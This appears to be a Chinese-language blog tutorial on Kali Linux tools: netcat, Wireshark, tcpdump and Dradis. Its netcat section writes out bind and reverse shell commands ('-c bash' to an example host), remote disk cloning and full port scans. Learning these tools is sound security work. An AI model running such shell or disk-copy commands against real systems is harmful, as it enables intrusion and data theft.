信息安全深透测试与工房(五)Kali 环境下的常用工具
Kali 系统环境下有着不少非常实用的工具软件,对我们去测试网络和检测系统有很大的帮助。因为前一段时间我去备考建造师,所以有三个月没有更新了,这次我就多写一些。
1、首先我来介绍一款网络工具NETCAT—NC
在网络工具中有“瑞士军刀”美誉的NetCat, 在我们用了N年了至今仍是爱不释手。
nc的作用
(1)实现任意TCP/UDP端口的侦听,nc可以作为server以TCP或UDP方式侦听指定端口
(2)端口的扫描,nc可以作为client发起TCP或UDP连接
(3)机器之间传输文件
(4)机器之间网络测速
- 命令 nc -vn 123.126.97.79 110
-vn:是以客户端去连接,不进行DNS解释
123.126.97.79 110:后面跟要探测的IP地址和端口号。如下,我们先找一下163邮箱的IP,然后去检测端口:
也可以连接80端口,我们测试MSF平台:
- 命令 NC—传输⽂本信息
A:nc -l -p 333 #服务器先打开一个侦听端口
-p 333:设置端口号
B:nc –nv 10.1.1.12 333 #作为客户端去连接
10.1.1.12 333:服务器端的IP+端口号
- 远程电⼦取证信息收集
查看非常多的内容时,可以保存到一个文件里。-q 1:信息传输完成后1秒钟后自动退出。
- NC—传输⽂件/目录
传输文件
A:nc -lp 333 > 1.mp4 #正向传输
B:nc -nv 1.1.1.1 333 < 1.mp4 –q 1
或 A:nc -q 1 -lp 333 < a.mp4 #反向传输
B: nc -nv 1.1.1.1 333 > 2.mp4
传输目录
A:tar -cvf - music/ | nc -lp 333 –q 1
B:nc -nv 1.1.1.1 333 | tar -xvf
加密传文件
A:nc -lp 333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.mp4
B: mcrypt --flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 1.1.1.1 333 -q 1
- NC—流媒体服务
A: cat 1.mp4 | nc -lp 333
B: nc -nv 10.1.1.13 333 | mplayer -vo x11 -cache 3000
- NC—端⼝扫描
nc -nvz 192.168.58.20 1-65535 #-z:扫描要探测的TCP端口
nc –vnzu 192.168.58.20 1-1024 #-zu:扫描要探测的UDP端口
- NC—远程克隆硬盘
A: nc -lp 333 | dd of=/dev/sda
B: dd if=/dev/sda | nc -nv 1.1.1.1 333 –q 1
远程电⼦取证,可以将目标服务器硬盘远程复制,或者内存。
- NC——远程控制
正向: A:nc -lp 333 -c bash
B:nc 1.1.1.1 333
反向: A:nc -lp 333
B:nc 1.1.1.1 333 -c bash #注:Windows⽤户把bash改成cmd;
- NC——NCAT
Nc缺乏加密和⾝份验证的能⼒ ,Ncat包含于nmap⼯具包中
A:ncat -c bash --allow 192.168.20.14 -vnl 333 --ssl
B:ncat -nv 1.1.1.1 333 –ssl
2、WIRESHARK抓包软件
Wireshark(前称Ethereal)是一个网络封包分析软件。网络封包分析软件的功能是撷取网络封包,并尽可能显示出最为详细的网络封包资料。
在这里我们先选中使用什么网卡来抓包,一定要选中混杂模式,这样才能抓取所有的数据包:
怎样去使用或者是利用Wireshark软件,我这里不详细的去说,因为这个软件太强大,所以还是自己去网上找相关的内容去看吧。但有几点我们要注意:
一个个的数据包查看效率不高,可以直接查看完整的数据流。对着其中一个数据包右键:
- 可以查看统计,去认识整个抓包里的详细数据:
- 可以去WIRESHARK网站去下载特定类型的数据去学习和判断问题。https://wiki.wireshark.org/SampleCaptures/
- 可以去查看专家信息,来分析问题:
3、TCPDUMP抓包软件
它就是:dump the traffic on a network,根据使用者的定义对网络上的数据包进行截获的包分析工具。非图形化工具,Linux、Unix系统默认安装。这个软件我是觉得一般的技术人员用的不多,这里只是了解一下就可以了。
- tcpdump -i eth0 -s 0 -w file.pcap #抓取eth0网卡数据包
- tcpdump -r file.pcap #读取刚才抓取的数据包文件
- tcpdump -n -r http.cap | awk '{print $3}'| sort –u #只显示文件中第三列的内容,并剔除重复项。
- tcpdump -n src host 145.254.160.237 -r http.cap #只显示源地址为254.160.237的数据包
- tcpdump -n port 53 -r http.cap #显示端口号为53的数据包
- tcpdump -A -n 'tcp[13] = 24' -r http.cap #高级筛选 显示TCP的第13号字节,数值等于24的数据包。
4、Dradis过程文档记录
Dradis它是数据管理和报告工具。
- apt-get install dradis #安装此软件
- 运行dradis软件
按上面红框内的地址,使用浏览器打开(第一次打开设置新密码):
软件主界面:
其实这个软件具体怎么用其实我也不太清楚!!!
网上也很少有相关介绍文章,英语好的同学可以上外网去学习。
好了这期我做的时间确实有些长,但我这期的内容也是不少,希望各位看官能够满意。下期接着讲怎样使用Kali里面的工具进行网络中被动信息收集。






































